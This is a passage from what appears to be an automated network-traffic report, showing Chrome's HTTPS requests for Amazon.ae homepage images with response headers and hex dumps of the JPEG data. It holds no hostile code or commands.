                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:08 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000045-IAD, cache-ewr-kewr1740023-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 28 00 00 ff e1 03 1f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                                        Data Ascii: ExifII*Ducky(http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: ed b5 53 73 8b 65 b6 b7 64 e2 e6 15 80 00 00 00 06 40 86 73 ae b0 a4 db dc 76 d4 6e fb 64 9d 88 c6 4e 64 80 00 00 00 03 5d 79 3b 78 77 67 93 ae ac aa f6 8e 6a 99 52 b9 af bc 97 62 a1 61 90 93 d4 69 bc 45 69 e5 d1 23 e8 1d be d0 33 dc 10 68 00 00 1e 75 cb 04 17 a3 d1 ef 3d 5d b0 d4 c8 38 fb 40 01 15 2b 19 bd 1b 9f 0f 4f 49 97 74 cc 3c c7 9d c4 2b 00 00 0c f3 9e 87 1f 6c 95 24 39 32 00 08 a2 c2 bd da 7a 64 8c c1 e6 c1 54 07 ff da 00 08 01 02 00 01 05 01 e3 d6 db ab 0b fc 61 2b 99 95 89 49 ad 62 3c 08 e6 29 6a 09 7a ed 27 45 bc 4f 02 a8 7e 0f 82 81 03 5b 18 f9 dd be e8 19 99 f4 92 69 41 59 76 de fa 89 8d ad 2a 00 96 50 25 d7 0d 9a e8 21 58 f3 1f 41 5a 68 f2 1f b2 98 cc aa f0 f2 97 aa be cd 3b ed f6 54 fa ae 7f bf 54 fd 9a b1 f6 fa 7f ff da 00 08 01 03 00 01
                                                                                                                                                                                                        Data Ascii: Ssed@svndNd]y;xwgjRbaiEi#3hu=]8@+OIt<+l$92zdTa+Ib<)jz'EO~[iAYv*P%!XAZh;TT
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: 4d 04 5d cd b2 cc 61 44 e6 4e 54 6d b6 e5 15 d4 e9 2a 4e 47 95 48 c4 1c 8f a8 73 d5 96 67 e5 53 cf ed 16 17 af 72 da 70 fa 46 26 b7 bb 5b 5a 85 9b b6 cb d9 0e 0a 99 55 c7 03 56 0b be d7 cb d5 d3 70 0f 3e 78 41 3d b9 57 f7 4f d6 68 ea 6d 1a ba a7 c5 d3 c7 3a b7 e6 73 6d 1f cb 3f 61 77 30 ab 9d 78 2d 80 bf 7b 3f 85 63 69 58 72 06 0f 74 d0 bb 6f a4 f3 cc 76 1f 44 da 7a 8c 72 98 9c 62 7b 2b c4 ec 16 30 1a e0 f7 c4 d2 9d 65 d0 9f 12 bb 4e 1c f1 8f b5 2f 5c b6 1a ed af cb 73 98 f6 50 bf 72 da b5 d5 1a 43 9c e3 97 c6 83 ae da d8 65 32 a6 32 23 2a 37 1f 6c 8c ec 75 16 23 33 ce a0 60 06 40 7d 88 39 b8 ff 00 1a 85 db 95 c3 f3 1b 4b 65 81 6c 0e 20 57 e5 ab 5b 61 83 0b 4d 97 31 e2 ab ea 78 32 fb e3 1f 44 da 48 0d 92 96 c4 02 70 04 d6 af d6 24 f1 85 10 38 d7 e3 ee 6d
                                                                                                                                                                                                        Data Ascii: M]aDNTm*NGHsgSrpF&[ZUVp>xA=WOhm:sm?aw0x-{?ciXrtovDzrb{+0eN/\sPrCe22#*7lu#3`@}9Kel W[aM1x2DHp$8m
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC119INData Raw: 7a e3 f2 06 98 3a 0f 31 ac eb 80 13 33 89 d0 0f 68 31 b1 0e e8 8f db 22 a6 d1 2b 74 0b 42 bc 54 f1 86 fb 55 e8 85 dd 70 05 7b 36 8d 29 07 54 e3 d9 e4 21 9e 04 52 51 ad 65 2c 55 12 90 0c b0 e7 4f 38 20 a0 2f 86 84 a2 07 4f 6b 43 f2 93 e6 36 cf 0e 67 8b 2d 71 f9 31 df d8 d0 bf ea 9c d8 33 bd 7a 5f ea f5 8c f0 9e 45 28 f0 91 c3 ae 4e ad ff 00 81 3e af ff d9
                                                                                                                                                                                                        Data Ascii: z:13h1"+tBTUp{6)T!RQe,UO8 /OkC6g-q13z_E(N>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        138192.168.2.449932151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC688OUTGET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621419_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 5960
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: e8f98a00-7d00-487a-822f-f9d6889248fd
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 15 Feb 2024 08:00:16 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Fri, 01 Apr 2044 20:01:54 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 168754
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:08 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000143-IAD, cache-ewr-kewr1740058-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a1 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 08 01 10 00 02 01 03 03 03 02 03 04 07 06 06 03 00 00 00 01 02 03 00 04 11 05 12 21 13 22 31 06 41 14 51 61 07 15 23 71 24 32 62 91 92 a1 d1 33 34 53 63 81 d2 16
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"1AQa#q$2b34Sc
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: dc c7 9c 80 30 7c 66 9b a7 69 5a c5 d2 d9 c8 23 b8 68 8c 81 d4 19 4e fd aa 61 56 6c c8 41 1d 4c b3 22 b7 cd ca 80 9c d3 50 d4 2f 13 61 8a 19 43 4e d2 b3 c0 f1 96 e4 4b b2 14 45 65 56 03 08 14 05 c9 dc c5 be 44 7c bc 5c 29 04 0c bc 6f 7b 5d 7b ec 36 22 d6 fc ad b9 22 a9 96 5e ce f1 bc 6d be c4 1e 7f 0a e9 7c 8a d1 ba d9 90 09 91 21 3e 43 49 80 11 15 41 c8 21 48 1b b0 46 71 5e ee ac e2 91 51 22 8f a8 e1 76 2a 73 03 ed 04 a0 66 2b e4 29 53 ce 31 82 72 0d 4c 5d fa 68 c3 26 23 6c ed 3c 1c 06 0b c6 de 14 e5 7c 71 e3 3f b9 6b 36 8b 68 2c 66 fc 45 da a5 c1 67 25 4a 6d 5f 19 27 bb 8e 49 f6 ae e6 e1 a9 29 4c 31 c7 3d c6 6b 8b 68 e3 9f 47 66 d6 f6 00 69 f0 b3 e9 b1 96 cd 23 8c 91 58 ec 7a 69 b5 bd 49 55 f8 fd 31 76 ee 77 a1 55 c9 ee e1 9b f9 76 e4 8e 4e 2a c7 6d a5
                                                                                                                                                                                                        Data Ascii: 0|fiZ#hNaVlAL"P/aCNKEeVD|\)o{]{6""^m|!>CIA!HFq^Q"v*sf+)S1rL]h&#l<|q?k6h,fEg%Jm_'I)L1=khGfi#XziIU1vwUvN*m
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: c0 7d 76 92 41 e2 a8 57 b0 96 43 6d 83 81 3f 95 e3 a5 63 18 e2 fd b6 5c b2 0d 5d 03 ba e9 97 8b 78 e2 6c f4 d1 30 0c 6c 98 8f 69 21 4b 30 c9 dc 1b 03 cb 60 54 96 b0 b2 58 da d9 47 3c a1 a4 b8 b8 8d 49 32 17 50 48 69 30 a7 ce 0b 63 20 6d fa 72 49 af 0d 6d a8 2f c3 dc ce dd c6 35 ea 00 a1 8a 0e 18 a0 52 b9 e4 9c b9 1e 07 01 49 c9 1e 2e ae e4 b2 9e cf 52 bc 61 75 02 98 c1 01 02 c8 00 60 e7 c3 72 d2 28 24 11 8e e5 19 c6 45 53 7d 9c ec cc 03 af b8 55 e6 ae 0f 6b 29 5b 6e c8 1c e3 40 0e ab b0 69 1a 65 96 96 75 1b 6d 32 27 b9 d4 6c 2d a2 ea c3 23 14 49 5a e1 04 91 ed 7c e3 e9 b7 72 2b 7d 36 f1 ab ae d9 c3 65 64 f7 32 bf c3 18 e3 b6 33 d9 ae d9 9a dc 4d 85 23 00 30 65 47 24 01 c2 b0 5a 90 6d 7f 56 bd 87 e2 34 3b 88 2e e0 91 cf 66 7a 53 42 a7 3c 29 7c c6 59 49 53
                                                                                                                                                                                                        Data Ascii: }vAWCm?c\]xl0li!K0`TXG<I2PHi0c mrIm/5RI.Rau`r($ES}Uk)[n@ieum2'l-#IZ|r+}6ed23M#0eG$ZmV4;.fzSB<)|YIS
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: 42 90 cf 52 d1 0b 49 9a fa 9f f1 e9 65 f4 b4 8c c9 00 b9 19 74 23 6f 75 cc b5 fb f4 8d 05 98 b4 2c d1 19 63 67 6e dd a8 48 ee 8c a1 df c0 5d c1 3b 3b 8b 06 e0 73 8b d3 6b 3e a1 79 75 f7 5d b4 45 09 b6 58 6e 58 31 8d 59 8a a0 49 4c 69 21 c1 66 04 a8 5c 2f 0e e5 41 04 d6 b5 5f 51 4d 75 6f f0 77 46 3d f3 33 33 98 d0 4a e8 49 ea 96 d8 c2 39 58 ab 64 04 76 1b 31 b7 18 35 b3 a7 fa b9 a2 8e 68 e6 76 45 93 83 d0 77 88 38 60 81 99 67 07 b7 aa 14 09 43 9c f3 bb 00 86 27 ea 23 a5 cb 13 58 fd 7a ae 59 4b 06 47 c2 05 9a 7b df 1b 0f 45 7c 55 9a 16 84 5f c3 1e 73 72 8f d1 90 cc b2 b4 04 40 f0 ba 81 d9 22 33 85 c8 27 77 1b 6a 4f 43 bd 92 d6 79 9a 4d db a3 b4 04 21 8d 93 7a a3 c5 1f 2c 40 42 c0 92 36 82 c1 19 f1 9a a0 6a 3e b2 bb f5 0c 11 25 be e5 42 85 63 71 33 99 14 c0
                                                                                                                                                                                                        Data Ascii: BRIet#ou,cgnH];;sk>yu]EXnX1YILi!f\/A_QMuowF=33JI9Xdv15hvEw8`gC'#XzYKG{E|U_sr@"3'wjOCyM!z,@B6j>%Bcq3
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC448INData Raw: 0a 17 36 03 99 c2 f9 97 cb 71 eb 97 17 f3 aa cb 2c 91 7f 99 26 41 03 3e 42 02 14 ed 3f 41 5d e6 01 0d 85 9d bb ee 96 e0 c8 70 f2 4d 71 23 b2 95 1c 82 43 05 50 31 85 0a 14 7b d6 0b af 4c 15 94 18 a1 84 0f a5 9d bf ff 00 71 1a 97 b6 d1 ee 23 5c 02 00 f9 08 62 51 c7 1e 02 62 ad 57 d2 4d 5b 92 ee d0 6a b8 a5 95 f0 3d f9 ec 5a 7a 0b 28 95 bf 92 e9 92 18 a4 78 f7 9e 43 39 bc 8f 81 9e e8 e5 de 76 fc f6 bc 66 b3 3b dd 24 21 2e ec cc b0 9f f0 94 5d 45 f9 bd 9b b0 b8 8b e8 b1 3c d8 a9 af bb 6e 7e 63 fe 94 7f ed a7 dd d7 3f 31 ff 00 4a 3f f6 55 41 82 4e dd 1a 46 5f 30 55 b3 59 11 b1 b1 05 41 db 5f d9 0c c7 05 ca c6 c4 1f c2 37 2d 13 0c fb 18 2e 00 64 1f 40 05 48 d8 eb ca b1 c0 8b be 54 56 90 f5 62 2a 4f 32 45 28 55 cb e0 73 11 57 19 e3 20 8c f2 2b 6e 5d 3a ea 41 b5
                                                                                                                                                                                                        Data Ascii: 6q,&A>B?A]pMq#CP1{Lq#\bQbWM[j=Zz(xC9vf;$!.]E<n~c?1J?UANF_0UYA_7-.d@HTVb*O2E(UsW +n]:A


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        139192.168.2.449928151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC688OUTGET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621420_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2864
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 3c480315-e639-4234-aa33-22c3b0ddaaf9
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 15 Feb 2024 08:00:16 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 10 Feb 2044 09:43:47 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1469545
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:08 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000173-IAD, cache-ewr-kewr1740060-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a0 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 08 02 01 09 10 00 02 02 01 02 02 06 06 06 06 07 09 00 00 00 00 01 02 00 03 04 05 11 06 12 13 21 22 31 41 51 07 32 61 71 91 a1 14 52 73 a2 b1 c1 08 15 42 62 64 82 23
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"1AQ2aqRsBbd#
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: df d3 b5 57 cb 3d 19 e1 67 b9 a9 d4 95 0b 24 65 f2 51 e4 5e 44 33 0b 5e 1d 1b eb 9a 40 fe 29 3e 40 ce 9b 9c d1 c3 03 7d 7b 48 ff 00 a8 fc 11 cc e9 79 6b 07 96 5e 6b 5c fa 8c 7e ca 77 7f 57 6f f8 1f f0 32 2b 86 ff 00 b3 70 7e cb f3 32 53 24 ed 55 df 67 67 f9 4c 8c e1 df ec dc 1f b2 1f 89 9b 7d 6e 6c 7d 25 bf b4 7f 92 98 88 89 25 62 22 20 22 22 02 7d 03 79 f2 20 70 d7 a4 3c f6 d4 38 8b 5a b9 bc 32 ac ad 7d 89 8b fe ce a3 ee 6f 32 9f 47 3c 71 aa d1 95 8b a4 3a 59 9f 80 f5 65 a3 69 83 94 97 ad d0 bd a2 bd f6 e7 28 a8 59 6b 2d e6 89 de 27 df 4b fc 25 6e 8f aa dd a8 aa ef 89 a8 5a 59 5f c1 2e 7e d5 b5 37 91 66 dd d3 eb 86 f3 56 98 6f 04 e7 fe ac d7 74 5c af 0a f3 71 b7 f6 2d 8e 2a 7f ba c6 07 47 1d 4b 1d ee a3 58 d0 33 53 13 50 d5 b3 c5 49 80 00 fa 31 15 f7 ae
                                                                                                                                                                                                        Data Ascii: W=g$eQ^D3^@)>@}{Hyk^k\~wWo2+p~2S$UggL}nl}%%b" ""}y p<8Z2}o2G<q:Yei(Yk-'K%nZY_.~7fVot\q-*GKX3SPI1
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC108INData Raw: 88 14 ed ac 3a ed 31 ac 8d 19 59 89 da 65 33 e6 c2 36 66 2f 30 c3 0e 86 27 9f d4 73 34 e4 11 c8 26 39 53 f1 16 61 a3 43 12 e6 ad 15 47 84 ca 79 04 fb ca 23 95 89 cd 69 47 63 e1 8a e4 88 1b 4f b1 32 84 c9 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 3f ff d9
                                                                                                                                                                                                        Data Ascii: :1Ye36f/0's4&9SaCGy#iGcO2?


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        140192.168.2.449929151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC688OUTGET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621421_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2772
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 7bf29dda-b4f0-49ac-b9e9-572b467a94ca
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 15 Feb 2024 08:00:16 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 19:58:11 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:08 GMT
                                                                                                                                                                                                        Age: 1260032
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100029-IAD, cache-ewr-kewr1740031-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9b 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 07 05 06 08 03 01 02 10 00 02 01 03 02 02 07 05 05 05 06 07 00 00 00 00 01 02 00 03 04 11 05 12 06 21 07 13 22 31 41 51 71 14 32 61 72 b1 15 33 73 81 b3 08 23 24 26 52 25 42 62
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"1AQq2ar3s#$&R%Bb
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: f8 26 6a 9a f3 d6 ab 67 c3 14 1d 1c 2d bd 1a 09 cd 18 05 63 59 d8 f3 c7 8a ed 33 aa 38 e3 80 f4 0d 6c d4 d5 35 8d eb ec f4 08 6a cb 50 a8 5a 49 97 e6 98 65 6c 12 65 7d a4 f0 6f 10 50 14 29 50 d5 6b 5b 59 15 2c 8e ae f5 0e d6 f7 11 69 16 44 e4 3b dc d2 a4 bf e0 62 67 3f 07 d5 b0 53 8f 5e f2 75 15 f0 ff 00 8b e7 05 a6 d3 d3 0f 2e 87 af aa d7 d6 38 8e d7 79 34 52 9d b3 04 ef 40 fd c5 bd 48 e4 66 5b a6 81 fd 85 7b f8 b6 bf ab 4e 6e 3c 23 c2 17 7a 25 d5 cd d5 de a2 6f 7a ea 4a 8b ba 82 d0 6a 60 36 f3 cd 58 86 cf a0 9a 8f 4c e3 3a 15 ef e2 da fe ad 39 ca e4 72 71 e6 fa a7 1f 2e 2f 6c da 8b f1 d2 d5 c3 92 b6 fb 4b 90 27 cc e2 48 ea 09 9f 05 b3 1f 09 ea 9a 0b 93 a0 8e 1b 5d 5b 58 af 7b 58 03 4a c2 88 ec 9e e7 a9 59 bf 75 f9 28 46 79 dc 16 c9 81 9f 13 e3 39 53 f6
                                                                                                                                                                                                        Data Ascii: &jg-cY38l5jPZIele}oP)Pk[Y,iD;bg?S^u.8y4R@Hf[{Nn<#z%ozJj`6XL:9rq./lK'H][X{XJYu(Fy9S
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC16INData Raw: 20 22 22 02 22 20 22 22 02 22 20 22 22 07 ff d9
                                                                                                                                                                                                        Data Ascii: """ """ ""


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        141192.168.2.449931151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC688OUTGET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621422_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2939
